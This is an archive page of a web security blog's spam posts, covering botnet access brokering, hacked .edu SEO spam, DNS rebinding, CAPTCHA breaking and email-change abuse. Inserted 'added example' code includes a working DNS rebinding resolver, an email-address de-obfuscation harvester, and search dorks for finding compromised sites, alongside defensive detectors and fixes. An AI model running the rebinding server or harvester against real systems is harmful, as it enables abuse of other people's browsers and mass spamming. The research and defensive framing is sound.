web application security lab

Archive for the 'spam' Category

Conversations With a Blackhat

Sunday, March 14th, 2010

I’ve been spending more and more time talking to blackhats lately. Frankly, I think they’re fascinating people, and have a lot to teach the rest of us. With the solemn promise that I won’t try to put them in jail, we can have free-flowing conversations which aid us all in thinking about the problem space. I’ve certainly learned a lot. Anyway, I got into a conversation with one of them about how he believes that a lot of the security put in place is actually doing a pretty good job.

The basic premise of the problem, from his perspective, is that hacking directly just isn’t as easy as it used to be, at least for someone like him. He’s not the type to hack randomly; he’s only interested in targeted attacks with big payouts. Sure, if you really work at it for days or weeks you’ll get in, almost always, but it’s not like it used to be, where you’d just run a handful of basic tests and you were guaranteed to break in. The risk is that now, when he sends his mules to go cash out, there’s a chance they’ll get nailed. Well, the more I thought about it the more I thought that this is a very solvable problem for bad guys. There are already other types of bad guys who do things like spam, steal credentials and DDoS. For that to work they need a botnet with thousands or millions of machines. The chances of a million-machine botnet having compromised at least one machine within a target of interest are relatively high.

So let’s say I’m badguy1 who wants to break into one or more companies of interest. Sure, I could work for days or weeks and maybe get into one or both of them, but at the risk of tipping my hand to the companies and there’s always a chance I’ll fail entirely. Or I could work with badguy2 who has a botnet. I could simply give a list of IPs, domains or email addresses of known targets to the bot herder and say that instead of paying a few cents to rent some arbitrary machine for a day, I’ll pay thousands of dollars to get a bot within the company I’m actually interested in.

This tactic reminds me a little of the movie Wall Street. You have a failing company (in this case a botnet that will probably only last a year or two). If the company continues on its course it’ll make a pretty good amount of money, but nowhere near as much as if the owners break up the company into pieces and sell them off one by one to the interested parties. Kind of an interesting/scary thought, but it could easily be used to avoid the cost and danger of individual exploitation against a company for a hacker interested in targeted attacks. Rather, a brokerage for commodities (bots that come from interesting IPs/domains) could be created and used to sell off the individual nodes. Using the existing backdoor into the company greatly reduces the risks involved for badguy1, because it’s guaranteed to be successful, without all the noise of a targeted attack.

If you were a blackhat, how much would you pay to have access to a machine inside of an organization that will lead to the big payout?

.EDU Hacks And Ambulance Chasing

Monday, January 25th, 2010

I struggled a lot with this over the last few weeks as I thought about it more and more. I’ve known for a very long time that the SEO guys were hacking .edu websites to increase their pagerank for keywords. By getting .edu (which ranks higher than .com for instance because the domains are old and highly connected) to link to a site with the right keywords, Google is tricked into thinking the site is of higher value. Yes, Google’s algorithm really is that simple to get around, which is why there is a lot of garbage in their index now. It just took a while for the bad guys to get a large enough mass of hacked sites.

So I started messing around with search strings that would help me identify sites that were highly likely to have been hacked and poof - within a few minutes I had dozens upon dozens of high value compromises:

inurl:.edu viagra
inurl:.edu cialis
inurl:.edu phentermine

There are millions of variants of these keyword phrases and their ilk across far greater masses of domains, but this should give you an idea of what’s possible. Some of them are truly amazingly bad. So I took it upon myself to start emailing a few that weren’t on this list but that were just as bad. You may or may not be surprised that I got almost no responses whatsoever. In fact, I only got one, and it accused me of spamming and/or ambulance chasing. Ugh! Talk about a way to make a guy want to quit being a good citizen.
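Once a search string like the ones above points you at a page, the next question is whether the pharma links are really there and whether they are hidden from visitors (injected SEO spam is usually tucked into an off-screen or display:none element so the site owner never notices). The following is an added example, not code from this post or from any scanner the post mentions: a stdlib-only Python parser that pulls out anchors whose href or text carries the keyword terms and notes whether an enclosing element hides them. The keyword list, the hidden-style patterns and the sample HTML (a made-up department page with pills.example links) are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Terms the post's search strings key on (constructed list; extend as needed).
SPAM_TERMS = re.compile(r"\b(viagra|cialis|phentermine|levitra|tramadol)\b", re.I)
# Common ways injected link blocks are kept out of sight (constructed heuristics).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}px", re.I)


class SpamLinkFinder(HTMLParser):
    """Collect <a> links whose href or anchor text carries pharma terms and record
    whether any enclosing element hides them."""

    def __init__(self):
        super().__init__()
        self.hidden_depth = 0   # >0 while inside a hidden element
        self.stack = []         # (tag, was_hidden), unwound on end tags
        self.current_href = None
        self.current_text = []
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden = bool(HIDDEN_STYLE.search(attrs.get("style") or "")) or "hidden" in attrs
        if hidden:
            self.hidden_depth += 1
        self.stack.append((tag, hidden))
        if tag == "a":
            self.current_href = attrs.get("href") or ""
            self.current_text = []

    def handle_data(self, data):
        if self.current_href is not None:
            self.current_text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self.current_href is not None:
            text = "".join(self.current_text).strip()
            if SPAM_TERMS.search(self.current_href) or SPAM_TERMS.search(text):
                self.findings.append({"href": self.current_href, "text": text,
                                      "hidden": self.hidden_depth > 0})
            self.current_href = None
        # Unwind to the matching start tag; ignore stray end tags.
        if not any(t == tag for t, _ in self.stack):
            return
        while self.stack:
            t, hidden = self.stack.pop()
            if hidden:
                self.hidden_depth -= 1
            if t == tag:
                break


def find_spam_links(html):
    """Return a list of {href, text, hidden} dicts for suspicious anchors."""
    parser = SpamLinkFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a legitimate page with an injected off-screen link block.
SAMPLE_HTML = """
<html><body>
<h1>Department of Chemistry</h1>
<p>Welcome to our <a href="/courses">course list</a>.</p>
<div style="position:absolute; left:-9999px">
  <a href="http://pills.example/buy">buy viagra online</a>
  <a href="http://pills.example/c">cheap cialis</a>
</div>
<p>Seminar: <a href="http://pills.example/phentermine">phentermine</a> is on Friday.</p>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_spam_links(SAMPLE_HTML):
        print(("HIDDEN  " if hit["hidden"] else "visible ") + hit["href"] + "  " + hit["text"])
```

Run it against the saved HTML of a page that a search string surfaced; a hit flagged as hidden is the strongest sign of a compromise rather than a legitimate (if odd) link, and it gives you something concrete to put in the notification e-mail.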

But this brings up an interesting problem. Who exactly are the Internet cops? Some would argue that stopbadware which is heavily sponsored by Google is the equivalent. But it clearly sucks - given that all these were found within Google’s own index. What is the right way to alert a company that they’ve been compromised? Is it even worth bothering? Is my own site going to be viewed as a spam site with links like those above? What an ugly problem!

DNS Rebinding for Scraping and Spamming

Wednesday, November 18th, 2009

Okay, last post about DNS Rebinding and then I’ll (probably) shut up about it for a while. If you haven’t already, please read posts one and two for context. As I was thinking about the best possible uses for DNS Rebinding I actually landed on something that is extremely practical for botnets, email scrapers, blog spammers and so on. One of the largest problems for most attackers/spammers is that they need to be able to scrape the search engines for targets, and the only way to do that is to send a massive amount of traffic at them; if they use a small subset of machines they are also making themselves easy to block or subvert. Google typically tries to stop robots from scraping by showing a CAPTCHA. Wouldn’t it be easier and better if the attacker/spammer could use other people’s IP addresses? That’s the promise of DNS Rebinding, now isn’t it - unauthenticated cross-domain read access from other people’s computers.

David Ross had a good post about how another practical defense against DNS Rebinding is using SSL/TLS, but since Google has opted not to secure their search engine, it becomes possible to use DNS Rebinding for its next logical use. Google hasn’t even fixed their other SSL/TLS woes so there’s pretty much no chance they’re going to secure the search engine any time soon. So DNS Rebinding gives the attacker IP diversity. An attacker can use DNS Rebinding to get other people to rip tons of information from Google without Google being able to block the real attacker. Since sites like Google do not respect the host header and they don’t use SSL/TLS an attacker can scrape information from these sites all they want - all the while using other people’s browsers. Now think comment spamming, polling fraud, brute force, and on and on… All of these become extremely easy and practical by burning other people’s IP addresses, instead of the attacker’s/spammer’s. Yes, DNS Rebinding is nasty, and unless the browser companies do something or every attacked web server on earth starts respecting the host header and/or using SSL/TLS it’s a problem that’s here to stay.

I know a lot of people think this is a complicated technique, but it’s really not that hard. It just requires some JavaScript (similar to BeEF or XSS Shell), a place to log whatever the user saw when the attacker forced them to perform the action, a hacked-up DNS server (like the simple DNS Rebinding server sample), a domain, a firewall that is somehow linked to the attacker/spammer application and some Internet traffic to abuse. None of these things are out of reach for a decently skilled attacker. Anyway, I doubt it’s getting fixed anytime soon, which means DNS Rebinding essentially allows nearly free rein for attackers and spammers for the foreseeable future - and no one appears to be doing anything about it.
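To make the moving parts concrete, here is an added example of my own, not the sample DNS rebinding server the post links to and not Google’s or any browser’s code: a minimal rebinding resolver in Python that answers the first lookup of a hostname with the attacker’s address and every later lookup with the target’s address at TTL 0, together with the Host-header check a web server can use to refuse rebound requests. The hostname rebind.example, the addresses 203.0.113.10 and 198.51.100.20 and the allowed host search.example.com are assumed placeholders from the documentation ranges; the browser’s DNS pinning delay is not modelled, only the resolver’s side of it.

```python
import ipaddress
import socket
import struct
from collections import defaultdict

# Constructed addresses (RFC 5737 documentation ranges), not real hosts.
ATTACKER_IP = "203.0.113.10"   # serves the page and the JavaScript that will do the scraping
TARGET_IP = "198.51.100.20"    # the search engine / victim service the browser is steered to
REBIND_NAME = "rebind.example."


class RebindingResolver:
    """Decide which A record to hand out for the rebinding hostname.

    The first lookup from a given recursive resolver gets the attacker's IP, so the
    browser loads the attacker's page under the origin http://rebind.example. Later
    lookups get the target's IP with TTL 0, so once the browser's DNS pin expires the
    page's JavaScript fetches http://rebind.example/... from the target while the
    same-origin policy still lets the script read the response.
    """

    def __init__(self, attacker_ip, target_ip):
        self.attacker_ip = attacker_ip
        self.target_ip = target_ip
        self.lookups = defaultdict(int)   # keyed by the resolver that asked, not the browser

    def answer(self, qname, resolver_ip):
        if qname.lower() != REBIND_NAME:
            return None
        self.lookups[resolver_ip] += 1
        ip = self.attacker_ip if self.lookups[resolver_ip] == 1 else self.target_ip
        return ip, 0   # TTL 0: re-resolve as soon as the client is willing to


def parse_query(packet):
    """Return (transaction id, qname, qtype, raw question section) of a DNS query."""
    txid = struct.unpack("!H", packet[:2])[0]
    off, labels = 12, []
    while packet[off] != 0:
        n = packet[off]
        labels.append(packet[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    off += 1                                   # root label terminator
    qtype = struct.unpack("!H", packet[off:off + 2])[0]
    return txid, ".".join(labels) + ".", qtype, packet[12:off + 4]


def build_query(txid, name):
    """Standard recursive A query for `name` (used by the tests and for local checks)."""
    labels = b"".join(bytes([len(l)]) + l.encode("ascii")
                      for l in name.rstrip(".").split("."))
    return (struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
            + labels + b"\x00" + struct.pack("!HH", 1, 1))


def build_response(txid, question, ip, ttl):
    """Response with one A record; 0xC00C is a compression pointer back to the question name."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + ipaddress.IPv4Address(ip).packed
    return header + question + rr


def answered_ip(response):
    """Address carried by the single A record built by build_response()."""
    return str(ipaddress.IPv4Address(response[-4:]))


def handle_packet(resolver, packet, client_ip):
    txid, qname, qtype, question = parse_query(packet)
    decision = resolver.answer(qname, client_ip) if qtype == 1 else None
    if decision is None:   # not our name or not an A query: NXDOMAIN
        return struct.pack("!HHHHHH", txid, 0x8183, 1, 0, 0, 0) + question
    ip, ttl = decision
    return build_response(txid, question, ip, ttl)


def host_header_ok(host_header, allowed=("search.example.com",)):
    """Server-side defense: a rebound request arrives with Host: rebind.example,
    so a server that only serves its own names rejects it whatever IP it came in on."""
    host = host_header.split(":", 1)[0].strip().lower()
    return host in allowed


def serve(bind=("127.0.0.1", 5353)):
    """Answer UDP queries on a local port; delegate the zone to this host to use it."""
    resolver = RebindingResolver(ATTACKER_IP, TARGET_IP)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        data, addr = sock.recvfrom(512)
        sock.sendto(handle_packet(resolver, data, addr[0]), addr)


if __name__ == "__main__":
    serve()
```

Querying it twice from the same resolver (for example with dig against 127.0.0.1 port 5353) shows the flip from the attacker’s address to the target’s. The server-side fix the post says Google lacked is the last function: if the scraped site compared the Host header against its own names, or served only over SSL/TLS so the certificate name would not match, the rebound request would fail no matter whose browser sent it.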

Cyborg CAPTCHA Breaking

Thursday, October 22nd, 2009

I normally steer very clear of articles like this, but I was totally fascinated when I heard this. Both rat neurons and human neurons were used to steer a robotic car. They did so completely without computer or human intervention. They literally “thought” about what they wanted to do to complete a task. Interesting take on a Cyborg - don’t start with a human and tear it down and replace its extremities with mechanical parts, start with a machine and introduce a blank slate of human brain tissue. Now, that’s amazing in its own right. But where are the applications for us in security? The first thing I thought of was a super advanced system for anomaly detection, but honestly, computers are far better at processing large data sets than people are. Plus brain-masses (for lack of a better term) lack knowledge and experience, so it would take years for them to even understand what they were looking at, let alone be better than a true human analyst. However, there is one thing that struck me as something that people mostly would agree humans should be better at than computers - CAPTCHA breaking.

Image analysis in general - yes, it’s possible, but CAPTCHAs should be easy. Just like a child, you’d have to teach it the alphabet, colors, lines, shapes, and all the basics. Then you’d have to give it a reward system so it wouldn’t fatigue (read The Terminal Man if you want to see why that part is potentially dangerously problematic). But assuming you can get all that done, there is no reason a human brain-mass shouldn’t be able to solve CAPTCHAs just like a human would. You wouldn’t need a head on it, or really anything else. You could have multi-core human brain-mass computers all shoved into a rack. Just need a way to feed them and you’ve got yourself the most effective human-analog CAPTCHA breaking system ever built. Scary and morbid, but extremely effective against all fluctuations in CAPTCHA design, assuming they were taught the parameters.

So what exactly is the definition of a CAPTCHA? I’ve harped on this before. But let’s think about it. What exactly is the measure of a human? Is it cognitive abilities? Then are intellectually disabled people no longer considered people? Is it a physical body part? Then are people who have had limbs removed no longer human? What exactly are we trying to measure with a CAPTCHA, if indeed the truest definition of such a thing could exist? I think what we are attempting to ascertain most of the time is intent. And with a human brain-mass anti-CAPTCHA system, that would no longer be something we could do. The only thing that what we currently think of as CAPTCHAs would still be effective at is increasing the cost of spam. Of course this is all science fiction and riddled with problems, not the least of which is expense. But there are unfathomable military applications for such things, where expense is no longer an obstacle. Skynet may be coming, but it might not be a computer - it might be human brain-mass. Scary.

Email Obfuscation and Spam Robots

Tuesday, September 8th, 2009

I’ve long been interested in spam and robots that scrape for email addresses. I’ve done tons of work in the space, although I’ve never published any of it. Call it more of a side hobby than anything I really want to go public with - as it is with a lot of my research. But anyway, today I was messing around with search engines and I found myself typing “at gmail dot com” into them for no apparent reason and poof, out popped a ton of valid although obfuscated email addresses. Aside from the raw text here’s a sampling of the different types:

…<at>gmail<dot>com
…(at) gmail (dot) com
… at-gmail-dot-com
… {at} {gmail} {dot} {com}
… [at] gmail [dot] com
… “at” gmail “dot” com
… at-gmail-dot-com-for.info
etc…

I think it would be interesting to create a generic algorithm for de-obfuscating email addresses of this nature. I’m sure it can be done to some degree, but some get more complicated, and I’m sure once you add in the variants of the username it gets even more complex. Even if you could get only 80% that would still be quite a feat. Still though, I have a feeling it wouldn’t take much effort to create a robot that made quick work of all those obfuscated email addresses. Of course, the benefit to a spammer in spamming people who proactively try to protect themselves from spam is questionable, but it’s still interesting.
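The post asks for a generic de-obfuscation algorithm, so here is one as an added example (my code, not anything the post published): normalize wrapper characters to spaces, then collapse standalone “at” and “dot” tokens together with the spaces, hyphens or underscores around them, and finally pull out whatever now looks like an address. The word-boundary look-arounds are what keep names like “kat” and “dotty” from being mangled; the sample strings are constructed from the variants listed above, with made-up local parts. The last listed variant (…at-gmail-dot-com-for.info) is deliberately left out, since nothing in the string says where the address ends.

```python
import re

# Wrapper characters spammers put around "at"/"dot" (or around every token): brackets,
# braces, angle brackets, straight and curly quotes. They become spaces rather than
# being deleted, so "john<at>gmail" does not collapse into "johnatgmail".
_WRAPPERS = re.compile(r'[\[\]\(\)\{\}<>"\'“”‘’]')

# "at" / "dot" as whole words, swallowing any run of spaces, hyphens or underscores
# on either side. The look-arounds keep "kat" and "dotty" intact.
_AT = re.compile(r'[\s\-_]*(?<![a-z0-9])at(?![a-z0-9])[\s\-_]*', re.I)
_DOT = re.compile(r'[\s\-_]*(?<![a-z0-9])dot(?![a-z0-9])[\s\-_]*', re.I)

# What a plausible address looks like once the text has been normalized.
_ADDR = re.compile(r'[a-z0-9._%+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}', re.I)


def normalize(text):
    """Rewrite obfuscated at/dot spellings into literal '@' and '.'."""
    text = _WRAPPERS.sub(" ", text)
    text = _AT.sub("@", text)
    text = _DOT.sub(".", text)
    return text


def extract_addresses(text):
    """Lower-cased addresses found in `text` after de-obfuscation, in order of appearance."""
    return [m.group(0).lower() for m in _ADDR.finditer(normalize(text))]


# Constructed samples mirroring the variants seen in search results.
SAMPLES = [
    "alice<at>gmail<dot>com",
    "bob (at) gmail (dot) com",
    "carol at-gmail-dot-com",
    "dave {at} {gmail} {dot} {com}",
    "erin [at] gmail [dot] com",
    "frank “at” gmail “dot” com",
    "contact dotty at example dot com or kat@example.org",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:55} -> {extract_addresses(sample)}")
```

Two passes are needed because “at” must be resolved before “dot” only by convention, not by necessity; what matters is that each pass sees whole-word tokens, which the wrapper-to-space step guarantees. Anything this misses (spelled-out user names, image-based addresses, JavaScript-assembled links) is exactly the residue a scraper author would chase next, which is why the post suspects the 80% mark is the easy part.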

Yahoo SEM Logic Flaw

Monday, June 16th, 2008

In the wake of a few different speeches by Jeremiah Grossman and Billy Hoffman on logic flaws, I thought this was pretty appropriate. I got an anonymous message today explaining how an interesting logic flaw popped up in the search engine marketing portion of Yahoo’s website. According to them, the site allows you to send them $30 for future spending with their advertising program, and in return you get $50 free SEM advertising as a promotional offer. The problem lies in the logic.

When a user signs up, the logic should state something like “if money is deposited then give a credit, if not then fail”. Unfortunately, according to them it doesn’t work that way. Regardless of whether your deposit is valid, and regardless of whether it fails, it will still credit your account $50. Whoops. I haven’t tested this or tried it, but according to them at least a few people have already been able to use this trick, and of course that’s then tied to spamming or traffic arbitraging.

Allbots.info Imagetotext.com

Friday, June 13th, 2008

If the title of this post sounds awfully spammy, that’s because it is. Someone sent me a link to allbots.info and imagetotext.com today. Both of which are tied together into one system that allows someone to purchase a robot and the human CAPTCHA breaking necessary to create accounts in some of the largest social networking sites out there.

These include MySpace, Hi5, Facebook, Youtube, Gmail, and on and on… This reminds me a lot of XRumer, which is also designed for the same purpose, but more for message boards and the like. Making hundreds of accounts for spamming is getting more commonplace and accessible. Just plunk down your stolen PayPal or Google Checkout IDs and you’re off to the races! CAPTCHAs aren’t working folks - we’re just creating another micro-industry.

Spammers Hurt The Blind

Sunday, May 4th, 2008

There’s an interesting link talking about the lawsuit that Rite Aid just settled regarding their accessibility issues. In part it was in regards to their in-store issues, but it was also about their online accessibility, specifically around CAPTCHAs. So I spent a little time doing some more research into other issues around CAPTCHAs and the blind and in fact there are even concerns around the audio CAPTCHAs for the deaf-blind users.

One thing that was interesting is that many of the sites that have been targeted for lawsuits and angst have been either online retailers or heavily text-based websites (Typepad, Livejournal, etc…). I guess that makes perfect sense, I just hadn’t thought about it before. I would expect there to be a lot more of this in the future, so if you use CAPTCHAs I’d consider at least getting an audio version, as I’ve discussed countless times. An interesting thought though: spammers have made it harder on the blind. Yet another reason to hate spammers, I guess.

Changing Email Addresses For Spam

Wednesday, March 5th, 2008

While looking back at some of my old speeches, and after writing the last blog post it occurred to me there is another attack I haven’t heard anyone talk about. Often times spammers will use contact member forms for spamming purposes. But most contact forms can’t spoof the contact name so this form of spamming is pretty limited. However, let’s consider another common scenario, which is that a user is allowed to change their email address. Almost never is there an email address confirmation link sent to make sure you are indeed the owner of the email address. So let’s take an actual example.

Let’s say Cathy wants to spam Alice, but Alice isn’t a member of the message board. Cathy signs up with two accounts, one to send messages from and one to receive them. Cathy logs in as the second user account and changes her email address to Alice’s. She then logs into the first user account and sends the spam, which then gets routed to Alice. Then Cathy logs in to her second account, switches it to the next spam victim, logs back into her first account and sends a second spam, and so on.

The limitations here are that the email itself must actually contain the spam message for this to work; if it’s just a notification with a link back to the platform, that won’t suffice, since Alice isn’t a legitimate user of the system, let alone someone with access to Cathy’s account. The second problem is that the email probably contains some site-specific information which can easily identify the spam as such. And thirdly, many sites send an email change notification to alert users that their email has been changed, so when Cathy switches her address over and over, she will also inadvertently be sending emails to her victims telling them that she’s switching accounts.

But in this way I believe many existing member to member communication functions can be used as spam gateways. Weird, huh?
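The fix is the confirmation link the post says is almost never sent: a new address is stored as pending and only takes effect when a token mailed to that address comes back. The following is an added example of my own, not code from any message board the post has in mind; it models a toy board with an `outbox` list standing in for real mail delivery, runs Cathy’s two-account trick against both the unverified and the verified flow, and reports which addresses ended up receiving the spam body. All names and addresses are constructed.

```python
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class User:
    name: str
    email: str
    pending_email: Optional[str] = None
    pending_token: Optional[str] = None


class Board:
    """Toy message board: member-to-member messages are delivered by e-mail to the
    recipient's address on file. `outbox` records (to_address, text) for inspection."""

    def __init__(self, verify_changes):
        self.verify_changes = verify_changes
        self.users = {}
        self.outbox = []

    def register(self, name, email):
        self.users[name] = User(name, email)

    def change_email(self, name, new_email):
        u = self.users[name]
        if not self.verify_changes:
            u.email = new_email        # the flaw in the post: no proof the caller owns new_email
            return None
        u.pending_email = new_email
        u.pending_token = secrets.token_urlsafe(16)
        # Only the holder of the new mailbox ever sees this; the body is fixed text, so
        # the attacker cannot ride their message on the confirmation itself.
        self.outbox.append((new_email, "Confirm your new address: /confirm?token=" + u.pending_token))
        return u.pending_token

    def confirm_email(self, name, token):
        u = self.users[name]
        if u.pending_token is None or not secrets.compare_digest(token, u.pending_token):
            return False
        u.email, u.pending_email, u.pending_token = u.pending_email, None, None
        return True

    def send_message(self, sender, recipient, body):
        to = self.users[recipient]
        self.outbox.append((to.email, f"New message from {sender}: {body}"))


def run_cathy_attack(verify_changes):
    """Cathy's two-account trick; returns the addresses that received the spam body."""
    board = Board(verify_changes)
    board.register("cathy1", "cathy1@spam.example")
    board.register("cathy2", "cathy2@spam.example")
    for victim in ("alice@victim.example", "bob@victim.example"):
        board.change_email("cathy2", victim)   # with verification, Cathy never gets the token
        board.send_message("cathy1", "cathy2", "buy my pills")
    return [to for to, text in board.outbox if "buy my pills" in text]


if __name__ == "__main__":
    print("unverified:", run_cathy_attack(False))
    print("verified:  ", run_cathy_attack(True))
```

With verification on, the spam stays inside Cathy’s own mailboxes; the victim still receives the fixed-text confirmation mail, which is the third limitation the post notes, so rate-limit pending changes per account as well. The constant-time comparison and the random token are the usual care points for any link-based confirmation.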

Okay to Spam, Bad to Fight it in North Dakota

Thursday, January 17th, 2008

I saw this article today and I just thought it was too amazing. So it turns out that in North Dakota one very technologically impaired judge felt that running a zone transfer, among other things, is illegal. David Ritz was attempting to shut down a spammer, using the normal tactics to find out who was running the server that you’d expect, like looking at whois info, traceroute, etc…. Oh no, not in North Dakota you don’t! He’s facing possible jail time for attempting to fight spam. Now there’s a twist for you! Isn’t there some sort of oversight for technically challenged judges? Or maybe an “I don’t know anything about this stuff, perhaps you should talk to Judge Bob about this instead, since he does” type system?

While Cynthia Rothe-Seeger’s (the district judge on this case) opinions are obviously technically questionable, given that many of these tools are written specifically to find public information (that means available for anyone, including anti-spam organizations), this could set a legal precedent that enables spammers to operate with near legal impunity out of North Dakota. Great. So if you or someone you are investigating is based out of North Dakota - I’d watch this lawsuit until this is settled. Talk about taking one giant leap backwards for mankind. So Fierce is off limits to you North Dakotans!